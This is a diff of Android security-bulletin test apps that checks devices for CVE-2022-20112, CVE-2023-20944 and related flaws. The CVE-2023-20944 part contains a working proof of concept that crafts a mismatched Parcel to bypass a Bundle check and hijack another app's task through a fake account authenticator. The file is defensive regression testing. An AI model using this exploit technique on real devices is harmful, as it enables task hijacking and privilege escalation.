+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_39622;
+
+import android.content.Intent;
+import android.net.VpnService;
+import android.os.ParcelFileDescriptor;
+
+public class PocService extends VpnService {
+ private ParcelFileDescriptor mInterface;
+
+ @Override
+ public int onStartCommand(Intent intent, int flags, int startId) {
+ try {
+ mInterface =
+ new Builder()
+ .setSession(getString(R.string.vpnSessionName))
+ .addAddress(getString(R.string.ipv4Address), 24)
+ .addRoute(getString(R.string.port), 0)
+ .establish();
+ } catch (Exception e) {
+ // Ignore unintended exceptions here
+ }
+ return START_STICKY;
+ }
+
+ @Override
+ public void onDestroy() {
+ try {
+ if (mInterface != null) {
+ mInterface.close();
+ mInterface = null;
+ }
+ super.onDestroy();
+ stopSelf();
+ } catch (Exception e) {
+ // Ignore unintended exceptions here
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20112/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20112/res/values/strings.xml
deleted file mode 100644
index af45847..0000000
--- a/hostsidetests/securitybulletin/test-apps/CVE-2022-20112/res/values/strings.xml
+++ /dev/null
@@ -1,24 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<!--
- Copyright (C) 2022 The Android Open Source Project
-
- Licensed under the Apache License, Version 2.0 (the "License");
- you may not use this file except in compliance with the License.
- You may obtain a copy of the License at
-
- http://www.apache.org/licenses/LICENSE-2.0
-
- Unless required by applicable law or agreed to in writing, software
- distributed under the License is distributed on an "AS IS" BASIS,
- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- See the License for the specific language governing permissions and
- limitations under the License.
--->
-<resources>
- <string name="defaultSettingsPkg">com.android.settings</string>
- <string name="getAvailabilityStatusMethodName">getAvailabilityStatus</string>
- <string name="privateDnsPreferenceControllerClassName">.network.PrivateDnsPreferenceController
- </string>
- <string name="testFailMsg">Device is vulnerable to b/206987762!! Private DNS can be modified in
- guest mode</string>
-</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20112/src/android/security/cts/CVE_2022_20112/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2022-20112/src/android/security/cts/CVE_2022_20112/DeviceTest.java
index 96cb205..731c594 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2022-20112/src/android/security/cts/CVE_2022_20112/DeviceTest.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20112/src/android/security/cts/CVE_2022_20112/DeviceTest.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -17,10 +17,12 @@
package android.security.cts.CVE_2022_20112;
import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
import static org.junit.Assert.assertFalse;
import static org.junit.Assume.assumeNoException;
import static org.junit.Assume.assumeTrue;
+import android.app.Instrumentation;
import android.app.UiAutomation;
import android.content.ComponentName;
import android.content.Context;
@@ -40,51 +42,64 @@
public class DeviceTest {
@Test
- public void testprivateDnsPreferenceController() {
- UiAutomation uiAutomation = null;
+ public void testPrivateDnsPreferenceController() {
try {
- Context context = getInstrumentation().getTargetContext();
+ final Instrumentation instrumentation = getInstrumentation();
+ final Context context = instrumentation.getContext();
// Retrieve settings package name dynamically
Intent settingsIntent = new Intent(Settings.ACTION_SETTINGS);
ComponentName settingsComponent =
settingsIntent.resolveActivity(context.getPackageManager());
- String settingsPkgName = settingsComponent != null ? settingsComponent.getPackageName()
- : context.getString(R.string.defaultSettingsPkg);
+ String settingsPkgName =
+ settingsComponent != null
+ ? settingsComponent.getPackageName()
+ : "com.android.settings";
// Get vulnerable method 'getAvailabilityStatus' using reflection
- Context settingsContext = context.createPackageContext(settingsPkgName,
- Context.CONTEXT_INCLUDE_CODE | Context.CONTEXT_IGNORE_SECURITY);
+ final Context settingsContext =
+ context.createPackageContext(
+ settingsPkgName,
+ Context.CONTEXT_INCLUDE_CODE | Context.CONTEXT_IGNORE_SECURITY);
ClassLoader settingsClassLoader = settingsContext.getClassLoader();
Class<?> privateDnsPreferenceControllerClass =
- settingsClassLoader.loadClass(settingsPkgName
- + context.getString(R.string.privateDnsPreferenceControllerClassName));
+ settingsClassLoader.loadClass(
+ settingsPkgName + ".network.PrivateDnsPreferenceController");
Constructor<?> privateDnsPreferenceControllerCstr =
privateDnsPreferenceControllerClass.getConstructor(Context.class);
Object privateDnsPreferenceControllerObject =
privateDnsPreferenceControllerCstr.newInstance(settingsContext);
- Method getAvailabilityStatusMethod = privateDnsPreferenceControllerClass
- .getDeclaredMethod(context.getString(R.string.getAvailabilityStatusMethodName));
+ Method getAvailabilityStatusMethod =
+ privateDnsPreferenceControllerClass.getDeclaredMethod("getAvailabilityStatus");
getAvailabilityStatusMethod.setAccessible(true);
// Check if current user is guest user
- uiAutomation = getInstrumentation().getUiAutomation();
- uiAutomation.adoptShellPermissionIdentity(android.Manifest.permission.CREATE_USERS);
final UserManager userManager = context.getSystemService(UserManager.class);
- assumeTrue(userManager.isGuestUser());
-
- // Invoke vulnerable method 'getAvailabilityStatus'
- int status =
- (int) getAvailabilityStatusMethod.invoke(privateDnsPreferenceControllerObject);
- assertFalse(context.getString(R.string.testFailMsg), status == 0 /* AVAILABLE */);
+ try (AutoCloseable withAdoptShellPermissionIdentity =
+ withAdoptShellPermissionIdentity(
+ instrumentation, android.Manifest.permission.CREATE_USERS)) {
+ assumeTrue(userManager.isGuestUser());
+ // Invoke vulnerable method 'getAvailabilityStatus'
+ int status =
+ (int)
+ getAvailabilityStatusMethod.invoke(
+ privateDnsPreferenceControllerObject);
+ assertFalse(
+ "Device is vulnerable to b/206987762!! Private DNS can be modified in"
+ + " guest mode",
+ status == 0 /* AVAILABLE */);
+ }
} catch (Exception e) {
assumeNoException(e);
- } finally {
- try {
- uiAutomation.dropShellPermissionIdentity();
- } catch (Exception ignored) {
- // Ignore exception here
- }
}
}
+
+ private AutoCloseable withAdoptShellPermissionIdentity(
+ Instrumentation instrumentation, String permission) {
+ final UiAutomation uiAutomation = instrumentation.getUiAutomation();
+ uiAutomation.adoptShellPermissionIdentity(permission);
+
+ // Remove permissions
+ return () -> uiAutomation.dropShellPermissionIdentity();
+ }
}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/Android.bp
new file mode 100644
index 0000000..89c9df9
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/Android.bp
@@ -0,0 +1,58 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-20944-target",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "target-app/src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ manifest: "target-app/AndroidManifest.xml",
+ sdk_version: "current",
+}
+
+android_test_helper_app {
+ name: "CVE-2023-20944-test",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "test-app/src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ ],
+ manifest: "test-app/AndroidManifest.xml",
+ resource_dirs: [
+ "res",
+ "test-app/res",
+ ],
+ platform_apis: true,
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/res/values/strings.xml
new file mode 100644
index 0000000..17f8d12
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/res/values/strings.xml
@@ -0,0 +1,37 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <string name="accountType">android.security.cts.CVE_2023_20944_test.account</string>
+ <string name="actionTarget">actionTarget</string>
+ <string name="activityName">android.accounts.ChooseTypeAndAccountActivity</string>
+ <string name="activityTarget">android.security.cts.CVE_2023_20944_target.TargetActivity</string>
+ <string name="allowableAccountTypes">allowableAccountTypes</string>
+ <string name="bcastActionTarget">CVE_2023_20944_TargetActivity</string>
+ <string name="launchTaskId">android.activity.launchTaskId</string>
+ <string name="msgFail">Device is vulnerable to b/244154558 !!</string>
+ <string name="noExceptionMsg">no exception</string>
+ <string name="pkgName">android</string>
+ <string name="pkgTarget">android.security.cts.CVE_2023_20944_target</string>
+ <string name="pocCrashedMsg">PocActivity crashed with exception: %s</string>
+ <string name="pocFailedMsg">pocActivity failed</string>
+ <string name="spannableString">AAAAAAAAAAAA\n</string>
+ <string name="status">status</string>
+ <string name="targetFailMsg">TargetActivity did not launch successfully</string>
+ <string name="taskId">taskId</string>
+ <string name="taskOverlay">android.activity.taskOverlay</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/target-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/target-app/AndroidManifest.xml
new file mode 100644
index 0000000..dc41a97
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/target-app/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright (C) 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_20944_target">
+ <application>
+ <activity android:name=".TargetActivity"
+ android:exported="true" />
+ </application>
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/target-app/src/android/security/cts/CVE_2023_20944_target/TargetActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/target-app/src/android/security/cts/CVE_2023_20944_target/TargetActivity.java
new file mode 100644
index 0000000..03b7c27
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/target-app/src/android/security/cts/CVE_2023_20944_target/TargetActivity.java
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_20944_target;
+
+import android.app.Activity;
+import android.content.Intent;
+
+public class TargetActivity extends Activity {
+
+ @Override
+ protected void onResume() {
+ try {
+ super.onResume();
+ sendBroadcast(new Intent(getString(R.string.bcastActionTarget))
+ .putExtra(getString(R.string.actionTarget), true)
+ .putExtra(getString(R.string.taskId), getTaskId()));
+ } catch (Exception ignored) {
+ // ignoring exceptions here
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/AndroidManifest.xml
new file mode 100644
index 0000000..45cb90b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/AndroidManifest.xml
@@ -0,0 +1,35 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_20944_test">
+ <application>
+ <activity android:name=".PocActivity" />
+ <activity android:name=".HijackActivity" />
+ <service android:name=".PocAuthService"
+ android:exported="false">
+ <intent-filter>
+ <action android:name="android.accounts.AccountAuthenticator" />
+ </intent-filter>
+ <meta-data
+ android:name="android.accounts.AccountAuthenticator"
+ android:resource="@xml/authenticator" />
+ </service>
+ </application>
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_20944_test" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/res/xml/authenticator.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/res/xml/authenticator.xml
new file mode 100644
index 0000000..c58bc2e
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/res/xml/authenticator.xml
@@ -0,0 +1,19 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<account-authenticator xmlns:android="http://schemas.android.com/apk/res/android"
+ android:accountType="android.security.cts.CVE_2023_20944_test.account" />
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/DeviceTest.java
new file mode 100644
index 0000000..a0c7a241
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/DeviceTest.java
@@ -0,0 +1,126 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_20944_test;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.ActivityTaskManager;
+import android.app.IActivityTaskManager;
+import android.app.UiAutomation;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.os.ServiceManager;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+ private String mPocActivityStatus;
+ private int mTaskId;
+
+ @Test
+ public void testCVE_2023_20944() {
+ try {
+ final int waitMs = 5000;
+ final int waitPerIter = 200;
+ Context context = getInstrumentation().getContext();
+ UiAutomation uiAutomation = getInstrumentation().getUiAutomation();
+ uiAutomation.adoptShellPermissionIdentity();
+
+ // Registering a receiver here to wait for a broadcast from TargetActivity
+ final Semaphore targetReturn = new Semaphore(0);
+ final Semaphore pocReturn = new Semaphore(0);
+ BroadcastReceiver broadcastReceiver = new BroadcastReceiver() {
+ @Override
+ public void onReceive(Context context, Intent intent) {
+ try {
+ if ((intent.getBooleanExtra(context.getString(R.string.actionTarget), false)
+ && (mTaskId = intent.getIntExtra(context.getString(R.string.taskId),
+ -1)) != -1)) {
+ targetReturn.release();
+ }
+ if ((mPocActivityStatus = intent
+ .getStringExtra(context.getString(R.string.status))) != null) {
+ pocReturn.release();
+ }
+ } catch (Exception ignored) {
+ // ignore any exceptions
+ }
+ }
+ };
+ IntentFilter filter = new IntentFilter(context.getString(R.string.bcastActionTarget));
+ context.registerReceiver(broadcastReceiver, filter);
+
+ // Start TargetActivity
+ Intent targetIntent = new Intent(Intent.ACTION_MAIN);
+ final String pkgTarget = context.getString(R.string.pkgTarget);
+ targetIntent.setClassName(pkgTarget, context.getString(R.string.activityTarget));
+ targetIntent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ context.startActivity(targetIntent);
+ assumeTrue(context.getString(R.string.targetFailMsg),
+ targetReturn.tryAcquire(waitMs, TimeUnit.MILLISECONDS));
+
+ // Start PocActivity which in turn starts the ChooseTypeAndAccountActivity
+ Intent intent = new Intent(context, PocActivity.class);
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ context.startActivity(intent);
+ assumeTrue(context.getString(R.string.pocFailedMsg),
+ pocReturn.tryAcquire(waitMs, TimeUnit.MILLISECONDS));
+ assumeTrue(context.getString(R.string.pocCrashedMsg, mPocActivityStatus),
+ mPocActivityStatus.equals(context.getString(R.string.noExceptionMsg)));
+
+ // Failing the test if the taskId received from the target activity matches with the
+ // list of running taskId and topActivity has HijackActivity in the same taskId.
+ IActivityTaskManager iActivityTaskManager = IActivityTaskManager.Stub
+ .asInterface(ServiceManager.getService(Context.ACTIVITY_TASK_SERVICE));
+ long start = System.currentTimeMillis();
+ while (!(iActivityTaskManager.getAllRootTaskInfos().toString()
+ .contains(HijackActivity.class.getName()))
+ && System.currentTimeMillis() - start < waitMs) {
+ Thread.sleep(waitPerIter);
+ }
+ boolean isDeviceVulnerable = false;
+ List<ActivityTaskManager.RootTaskInfo> runningTasks =
+ iActivityTaskManager.getAllRootTaskInfos();
+ for (ActivityTaskManager.RootTaskInfo runningTaskInfo : runningTasks) {
+ for (int i = 0; i < runningTaskInfo.childTaskIds.length; ++i) {
+ if (mTaskId == runningTaskInfo.childTaskIds[i] && runningTaskInfo.topActivity
+ .getClassName().equals(HijackActivity.class.getName())) {
+ isDeviceVulnerable = true;
+ break;
+ }
+ }
+ }
+ assertFalse(context.getString(R.string.msgFail), isDeviceVulnerable);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/HijackActivity.java
similarity index 79%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/HijackActivity.java
index 4416990..921ffcd 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/HijackActivity.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -14,9 +14,9 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.CVE_2023_20944_test;
import android.app.Activity;
-public class PocActivity extends Activity {
+public class HijackActivity extends Activity {
}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/PocActivity.java
new file mode 100644
index 0000000..a4fb874
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/PocActivity.java
@@ -0,0 +1,108 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_20944_test;
+
+import android.app.Activity;
+import android.accounts.AccountManager;
+import android.content.Intent;
+import android.content.pm.LabeledIntent;
+import android.os.Bundle;
+import android.os.Parcel;
+import android.os.PersistableBundle;
+import android.text.SpannableString;
+import android.text.style.TtsSpan;
+
+public class PocActivity extends Activity {
+
+ @Override
+ protected void onResume() {
+ try {
+ super.onResume();
+ int targetTaskId = getTaskId() - 1;
+ Bundle options = new Bundle();
+ options.putBoolean(getString(R.string.taskOverlay), true);
+ options.putInt(getString(R.string.launchTaskId), targetTaskId);
+ LabeledIntent targetIntent =
+ new LabeledIntent(null, createLabelInjectingOptions(options), 0);
+ targetIntent.addFlags(Intent.FLAG_ACTIVITY_REORDER_TO_FRONT);
+ targetIntent.setClassName(this, HijackActivity.class.getName());
+
+ // Return LabeledIntent from AuthService.addAccount
+ PocAuthService.sAddAccountResponse = new Bundle();
+ PocAuthService.sAddAccountResponse.putParcelable(AccountManager.KEY_INTENT,
+ targetIntent);
+ startActivityForResult(new Intent()
+ .setClassName(getString(R.string.pkgName), getString(R.string.activityName))
+ .putExtra(getString(R.string.allowableAccountTypes),
+ new String[] {getString(R.string.accountType)}),
+ 1);
+ sendBroadcast(new Intent(getString(R.string.bcastActionTarget))
+ .putExtra(getString(R.string.status), getString(R.string.noExceptionMsg)));
+ } catch (Exception e) {
+ try {
+ sendBroadcast(new Intent(getString(R.string.bcastActionTarget))
+ .putExtra(getString(R.string.status), e.getMessage()));
+ } catch (Exception ignored) {
+ // ignore any exceptions
+ }
+
+ }
+ }
+
+ private CharSequence createLabelInjectingOptions(Bundle options) {
+ final int BUNDLE_MAGIC = 0x4C444E42; // 'B' 'N' 'D' 'L', copied from BaseBundle
+ Parcel p = Parcel.obtain();
+
+ p.writeInt(0); // Will hold length
+ p.writeInt(BUNDLE_MAGIC);
+
+ // BEGIN data
+ int startOffset = p.dataPosition();
+ p.writeInt(0); // \0 at end of resultWho
+ p.writeInt(-1); // requestCode
+ p.writeInt(0); // flags
+ p.writeInt(0); // profilerInfo == null
+ p.writeInt(1); // options != null
+ int innerBundleLengthPos = p.dataPosition();
+ p.writeBundle(options);
+ int endOffset = p.dataPosition();
+ // END data
+
+ // Expand inner Bundle to defeat enforceNoDataAvail check
+ p.setDataPosition(innerBundleLengthPos);
+ int innerBundleLength = p.readInt();
+ p.setDataPosition(innerBundleLengthPos);
+
+ // To fully consume the Parcel data and to avoid BadParcelableException, 72 is added in
+ // innerBundleLength
+ p.writeInt(innerBundleLength + 72);
+
+ // Fix PersistableBundle length
+ p.setDataPosition(0);
+ p.writeInt(endOffset - startOffset);
+
+ // Read result as PersistableBundle
+ p.setDataPosition(0);
+ PersistableBundle wrapperBundle = p.readPersistableBundle();
+ p.recycle();
+
+ // Make a CharSequence
+ SpannableString spannableString = new SpannableString(getString(R.string.spannableString));
+ spannableString.setSpan(new TtsSpan("", wrapperBundle), 0, 0, 0);
+ return spannableString;
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/PocAuthService.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/PocAuthService.java
new file mode 100644
index 0000000..389ede2
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-20944/test-app/src/android/security/cts/CVE_2023_20944_test/PocAuthService.java
@@ -0,0 +1,85 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_20944_test;
+
+import android.accounts.AbstractAccountAuthenticator;
+import android.accounts.Account;
+import android.accounts.AccountAuthenticatorResponse;
+import android.accounts.NetworkErrorException;
+import android.app.Service;
+import android.content.Context;
+import android.content.Intent;
+import android.os.Bundle;
+import android.os.IBinder;
+
+// Authenticator returning {@link #addAccountResponse} when addAccount operation is requested
+
+public class PocAuthService extends Service {
+ static Bundle sAddAccountResponse;
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ return new PocAuthenticator(this).getIBinder();
+ }
+
+ private static class PocAuthenticator extends AbstractAccountAuthenticator {
+ @Override
+ public Bundle addAccount(AccountAuthenticatorResponse response, String accountType,
+ String authTokenType, String[] requiredFeatures, Bundle options)
+ throws NetworkErrorException {
+ return sAddAccountResponse;
+ }
+
+ PocAuthenticator(Context context) {
+ super(context);
+ }
+
+ @Override
+ public Bundle editProperties(AccountAuthenticatorResponse response, String accountType) {
+ return null;
+ }
+
+ @Override
+ public Bundle confirmCredentials(AccountAuthenticatorResponse response, Account account,
+ Bundle options) throws NetworkErrorException {
+ return null;
+ }
+
+ @Override
+ public Bundle getAuthToken(AccountAuthenticatorResponse response, Account account,
+ String authTokenType, Bundle options) throws NetworkErrorException {
+ return null;
+ }
+
+ @Override
+ public String getAuthTokenLabel(String authTokenType) {
+ return null;
+ }
+
+ @Override
+ public Bundle updateCredentials(AccountAuthenticatorResponse response, Account account,
+ String authTokenType, Bundle options) throws NetworkErrorException {
+ return null;
+ }
+
+ @Override
+ public Bundle hasFeatures(AccountAuthenticatorResponse response, Account account,
+ String[] features) throws NetworkErrorException {
+ return null;
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/Android.bp
new file mode 100644
index 0000000..81c0f02
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/Android.bp
@@ -0,0 +1,51 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21107-test",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "test-app/src/**/*.java"
+ ],
+ test_suites: [
+ "sts",
+ ],
+ manifest: "test-app/AndroidManifest.xml",
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ "sts-device-util",
+ "compatibility-device-util-axt",
+ ],
+ platform_apis: true,
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21107-helper",
+ test_suites: [
+ "sts",
+ ],
+ manifest: "helper-app/AndroidManifest.xml",
+ sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/helper-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/helper-app/AndroidManifest.xml
new file mode 100644
